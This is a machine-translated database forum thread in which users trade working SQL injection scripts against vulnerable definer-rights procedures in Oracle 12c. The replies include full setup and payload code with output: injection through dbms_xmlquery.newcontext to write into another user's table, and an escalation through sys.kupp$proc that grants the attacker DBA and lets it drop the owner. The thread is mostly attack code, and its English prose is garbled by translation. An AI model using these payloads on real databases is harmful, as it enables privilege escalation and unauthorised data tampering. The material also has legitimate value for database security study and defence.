1

Topic: Sql an injection in Oracle 12c

Kind time of days! There is David Litchfilda's known operation, describing usage sql - injections for obtaining of powers dba: http://www.davidlitchfield.com/Exploiti … e_12c.pdf.
In operation the example showing usage of unguarded procedure, created by the user sys is offered. Accordingly, having only access to this procedure and create session the privilege we can do everything that it is necessary for soul.
Problem in the following:
Let vulnerable procedure vulnProc is created not by the user sys, and user1 with a role dba.
Also there is a user user2, possessing rights of use of this procedure, the rights to creation of session and review of the tables created user1.
And here for the life of me, I can not understand how to use this vulnerability that user2 a smog make insert in the table user1.
I ask the help and council)

2

Re: Sql an injection in Oracle 12c

To begin with - procedure/function/packet by default forms c DEFINER RIGHTS o procedure means is fulfilled under security domain the owner with privileges given to the owner directly instead of through roles (roles are ignored and at compilation, by the way irrespective of DEFINER RIGHTS or INVOKER RIGHTS). Whether So-that is at user1 DBA or not no value has.
SY.

3

Re: Sql an injection in Oracle 12c

Thanks, I will know)
But the essence of a question from that does not change. Or, perhaps, someone knows other methods to lead an injection under the given conditions?

4

Re: Sql an injection in Oracle 12c

SoratoMan wrote:

Let vulnerable procedure vulnProc is created not by the user sys, and user1 with a role dba.
Also there is a user user2, possessing rights of use of this procedure, the rights to creation of session and review of the tables created user1.
And here for the life of me, I can not understand how to use this vulnerability that user2 a smog make insert in the table user1.
I ask the help and council)

We create users

drop user u1 cascade;
drop user u2 cascade;
create user u1 identified by 1;
grant create session, connect to u1;
grant dba to u1;
create user u2 identified by 1;
grant create session, connect to u2;

U1

connect u1/1
create or replace procedure p (p in varchar2) as
result int;
begin
execute immediate ' select count (*) from dual where ' || p || ' = 1 ' into result;
dbms_output.put_line (result);
end;
/
create table t as select 0 id from dual;
grant select on t to u2;
grant execute on p to u2;

U2

SQL> connect u2/1
Connected.
SQL> set serveroutput on
SQL> exec u1.p (q'#dbms_xmlquery.newcontext (' declare pragma autonomous_transaction; begin insert into t values (1); commit; end; ') # ');
0
PL/SQL procedure successfully completed.
SQL> select * from u1.t;
ID
----------
0
1

On 12 a shop covered.

5

Re: Sql an injection in Oracle 12c

Just for fun
We create users

drop user u1 cascade;
drop user u2 cascade;
create user u1 identified by 1;
grant create session, connect to u1;
grant dba to u1;
==> grant execute on sys.kupp$proc to u1;
create user u2 identified by 1;
grant create session, connect to u2;

U1

connect u1/1
create or replace procedure p (p in varchar2) as
result int;
begin
execute immediate ' select count (*) from dual where ' || p || ' = 1 ' into result;
dbms_output.put_line (result);
end;
/
grant execute on p to u2;

U2

SQL> connect u2/1
Connected.
SQL> exec u1.p (q'#sys.kupp$proc.create_master_process (' execute immediate "grant dba to u2"; ') # ');
PL/SQL procedure successfully completed.
SQL> drop user u1 cascade;
drop user u1 cascade
*
ERROR at line 1:
ORA-01031: insufficient privileges
==> SQL> connect u2/1
Connected.
==> SQL> drop user>>> u1 <<<cascade;
==> User dropped.

6

Re: Sql an injection in Oracle 12c

SoratoMan wrote:

Thanks, I will know)
But the essence of a question from that does not change. Or, perhaps, someone knows other methods to lead an injection under the given conditions?

If user2 has CREATE PROCEDURE:

drop user u1 cascade;
drop user u2 cascade;
create user u1 identified by u1
default tablespace users
quota unlimited on users;
grant create session, create table, create procedure to u1;
create user u2 identified by u2;
grant create session, create procedure to u2;
connect u1@pdb1sol12/u1
CREATE OR REPLACE
PROCEDURE VULNERABLE_PROC (P VARCHAR2)
IS
N NUMBER;
BEGIN
EXECUTE IMMEDIATE ' SELECT COUNT (*) FROM USER_OBJECTS WHERE OBJECT_NAME = ' "|| P || '"'
INTO N;
DBMS_OUTPUT.PUT_LINE (N);
END;
/
GRANT EXECUTE ON VULNERABLE_PROC TO U2;
CREATE TABLE TBL1 (ID NUMBER);
GRANT SELECT ON TBL1 TO U2;
connect u2@pdb1sol12/u2
CREATE OR REPLACE
FUNCTION INJECT (
P_ID NUMBER
)
RETURN VARCHAR2
AUTHID CURRENT_USER
IS
PRAGMA AUTONOMOUS_TRANSACTION;
BEGIN
EXECUTE IMMEDIATE ' INSERT INTO U1.TBL1 VALUES (:1)'
USING P_ID;
COMMIT;
RETURN NULL;
END;
/
GRANT EXECUTE ON INJECT TO U1;
EXEC U1.VULNERABLE_PROC (' TBL "|| U2.INJECT (99) ||" 1 ')
SELECT *
FROM U1.TBL1;
ID
----------
99
99
SQL>

Truth in 12C it is possible to avoid it through INHERIT PRIVILEGES.
SY.

7

Re: Sql an injection in Oracle 12c

Thanks big for councils)
But already from harm it would be desirable to understand as to apply the code from article not for sys.

8

Re: Sql an injection in Oracle 12c

SoratoMan wrote:

Thanks big for councils)
But already from harm it would be desirable to understand as to apply the code from article not for sys.

Where you saw sys except my stunting with sys.kupp$proc and what you understand under "not for sys"?
In respect of complexity magnification you can disassemble
1) at first script SY
2) then mine with dbms_xmlquery.newcontext
3) and in the last queue with sys.kupp$proc
(1) and (2) it simply possibility to use the right of other user to its objects through an injection;
And (3) is a typical case sql injection privilege escalation, but grant presence on sys.kupp$proc is completely not typical.

9

Re: Sql an injection in Oracle 12c

dbms_photoshop;
The question was set for the sake of achievement of 2 purposes:
1) to See examples of Sql-injections with what you and SY kindly helped)
2) to Learn, how to modify the code from article for application to the procedure created not under sys.

10

Re: Sql an injection in Oracle 12c

SoratoMan wrote:

to Learn how to modify the code from article for application to the procedure created not under sys.

Read in FAQ about the rights through a role to the full enlightenment.